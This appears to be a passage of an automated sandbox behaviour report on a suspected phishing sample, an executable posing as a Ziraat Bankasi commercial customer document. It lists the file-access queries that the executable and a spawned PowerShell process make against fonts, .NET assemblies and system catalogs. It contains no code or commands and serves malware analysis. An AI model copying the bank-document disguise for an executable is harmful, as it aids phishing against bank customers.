Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Queries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Queries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Queries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Queries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Queries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Queries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Queries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Queries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Queries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Queries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Queries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Queries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Queries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Queries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Queries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Queries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Queries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Queries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Queries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Queries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Queries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Queries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Queries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Queries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Queries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Queries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Queries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Queries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Queries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Queries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Queries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Queries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Queries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Queries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Queries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Queries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Queries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Queries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Queries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Queries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Queries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Queries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Queries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Queries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Queries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Queries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Queries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Queries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Queries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Queries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Queries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Queries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Queries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Queries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Queries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Queries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Queries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Queries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Queries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Queries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Queries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Queries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Queries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Queries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Queries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Queries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Queries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Queries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Queries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Queries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Queries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Queries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Queries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Queries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Queries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Queries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Queries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Queries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Queries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Queries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Queries volume information: C:\Windows\Fonts\OFFSYMB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Queries volume information: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation Jump to behavior
